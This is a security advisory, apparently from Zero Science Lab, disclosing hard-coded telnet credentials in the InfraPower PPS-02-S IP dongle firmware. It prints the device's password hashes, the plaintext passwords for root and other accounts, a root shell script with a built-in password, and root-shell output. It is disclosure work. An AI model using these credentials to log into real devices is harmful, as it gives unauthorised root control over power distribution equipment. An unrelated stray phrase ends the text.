InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access Vendor: Austin Hughes Electronics Ltd. Product web page: http://www.austin-hughes.com Affected version: Q213V1 (Firmware: V2395S) Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. Patented IP Dongle provides IP remote access to the PDUs by a true network IP address chain. Only 1xIP dongle allows access to max. 16 PDUs in daisy chain - which is a highly efficient cient application for saving not only the IP remote accessories cost, but also the true IP addresses required on the PDU management. Desc: InfraPower suffers from a use of hard-coded credentials. The IP dongle firmware ships with hard-coded accounts that can be used to gain full system access (root) using the telnet daemon on port 23. Tested on: Linux 2.6.28 (armv5tel) lighttpd/1.4.30-devel-1321 PHP/5.3.9 SQLite/3.7.10 Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5371 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php 27.09.2016 -- # cat /etc/passwd root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh bin:x:1:1:bin:/bin:/bin/sh daemon:x:2:2:daemon:/usr/sbin:/bin/sh adm:x:3:4:adm:/adm:/bin/sh lp:x:4:7:lp:/var/spool/lpd:/bin/sh sync:x:5:0:sync:/bin:/bin/sync shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh operator:x:11:0:Operator:/var:/bin/sh nobody:x:99:99:nobody:/home:/bin/sh admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh # showing accounts in root group: Username: root Password: 8475 -- Username: service Password: ipdongle -- Username: www Password: 9311 -- Username: www2 Password: 9311 # showing other less-privileged accounts: Username: user Password: 8475 -- Username: admin Password: 8475 -------- /mnt/mtd # echo $SHELL /sbin/root_shell.sh /mnt/mtd # cat /sbin/root_shell.sh #!/bin/sh trap ""2 3 9 24 # check login passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2` if [ "$passWork" = "1" ]; then login_file=/mnt/mtd/root_login now_timestamp=`date +%s` if [ -f $login_file ]; then line=`wc -l $login_file | cut -c 1-9` if [ "$line" != "0" ] && [ "$line" != "1" ] && [ "$line" != "2" ]; then pre_login=`tail -n 3 $login_file | cut -d " " -f 1` pre_result1=`echo $pre_login | cut -d " " -f 1` pre_result2=`echo $pre_login | cut -d " " -f 2` pre_result3=`echo $pre_login | cut -d " " -f 3` if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2` result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp` if [ "$result" != "success" ]; then echo $result exit 0 fi fi fi fi echo -n "password:" read pass if [ "$pass" != "999" ]; then echo "wrong password" echo fail $now_timestamp >> $login_file exit 0 fi echo success $now_timestamp >> $login_file fi /bin/sh /mnt/mtd # -------- /mnt/mtd # ls IMG001.exe boot.old.shload_config.logmain_confnet_conf passwd_confsnmp_confweb_conf PDU3_ini box_conf log_memCheck.txt main_conf.baknet_conf.old port_confsnmpd.conf PDU3_pol info.zip mac_addr me_login ntp_conf privatestart_service.log -------- /mnt/mtd # df -h FilesystemSizeUsed Available Use% Mounted on tmpfs 256.0M4.0K256.0M 0% /tmp /dev/mtdblock11.4M 96.0K1.3M 7% /mnt/mtd /dev/mtdblock51.0M 60.0K964.0K 6% /mnt/mtd1 /dev/mtdblock61.0M 60.0K964.0K 6% /mnt/mtd2 /dev/mtdblock71.0M 60.0K964.0K 6% /mnt/mtd3 -------- /www # ls -al drwxr-xr-x5 1013 10140 Jan 13 08:41 . drwxr-xr-x 16 root root0 Nov 28 11:17 .. -rwxr--r--1 1013 1014 6875 Apr 222014 CSSSource.php -rwxr--r--1 1013 1014291 Apr 222014 Config.php -rwxr--r--1 1013 1014 1685 Apr 222014 ConnPort.php -rwxr--r--1 1013 1014 5787 Apr 222014 FWUpgrade.php -rwxr--r--1 1013 1014 7105 Apr 222014 Firmware.php -rwxr--r--1 1013 101410429 Apr 222014 Function.php drwxr-xr-x2 1013 10140 Apr 222014 General -rwxr--r--1 1013 1014 1407 Apr 222014 Header.php -rwxr--r--1 1013 1014 6775 Apr 222014 IPSettings.php drwxr-xr-x2 1013 10140 Apr 222014 Images drwxr-xr-x2 1013 10140 Apr 222014 JavaScript -rwxr--r--1 1013 1014408 Apr 222014 JavaSource.php -rwxr--r--1 1013 1014849 Apr 222014 ListFile.php -rwxr--r--1 1013 101412900 Apr 222014 Login.php -rwxr--r--1 1013 1014355 Apr 222014 Logout.php -rwxr--r--1 1013 1014352 Apr 222014 Main_Config.php -rwxr--r--1 1013 1014 5419 Apr 222014 Menu.php -rwxr--r--1 1013 1014942 Apr 222014 Menu_3.php -rwxr--r--1 1013 1014 4491 Apr 222014 Ntp.php -rwxr--r--1 1013 101423853 Apr 222014 OutletDetails.php -rwxr--r--1 1013 1014 1905 Apr 222014 OutletDetails_Ajax.php -rwxr--r--1 1013 101448411 Apr 222014 PDUDetails.php -rwxr--r--1 1013 1014 4081 Apr 222014 PDUDetails_Ajax_Details.php -rwxr--r--1 1013 1014 1397 Apr 222014 PDUDetails_Ajax_Outlet.php -rwxr--r--1 1013 101419165 Apr 222014 PDULog.php -rwxr--r--1 1013 101429883 Apr 222014 PDUStatus.php -rwxr--r--1 1013 1014 4418 Apr 222014 PDUStatus_Ajax.php -rwxr--r--1 1013 1014 7791 Apr 222014 PortSettings.php -rwxr--r--1 1013 101424696 Apr 222014 SNMP.php -rwxr--r--1 1013 101438253 Apr 222014 SensorDetails.php -rwxr--r--1 1013 101427210 Apr 222014 SensorStatus.php -rwxr--r--1 1013 1014 5984 Apr 222014 SensorStatus_Ajax.php -rwxr--r--1 1013 101440944 Apr 222014 System.php -rwxr--r--1 1013 1014 4373 Apr 222014 UploadEXE.php -rwxr--r--1 1013 1014 9460 Apr 222014 User.php -rwxr--r--1 1013 101423170 Apr 222014 WriteRequest.php -rwxr--r--1 1013 1014 8850 Apr 222014 WriteRequest_Ajax.php -rwxr--r--1 1013 101410811 Apr 222014 dball.php -rwxr--r--1 1013 1014771 Apr 222014 doupgrate.php -rwxr--r--1 1013 1014 76 Apr 222014 index.php -rwxr--r--1 1013 1014 49 Apr 222014 nfs.sh -rwxr--r--1 1013 1014 5410 Apr 222014 production_test1.php -rwxr--r--1 1013 1014723 Apr 222014 vaildate.php -rwxr--r--1 1013 1014611 Apr 222014 wiseup.php
体验盒子
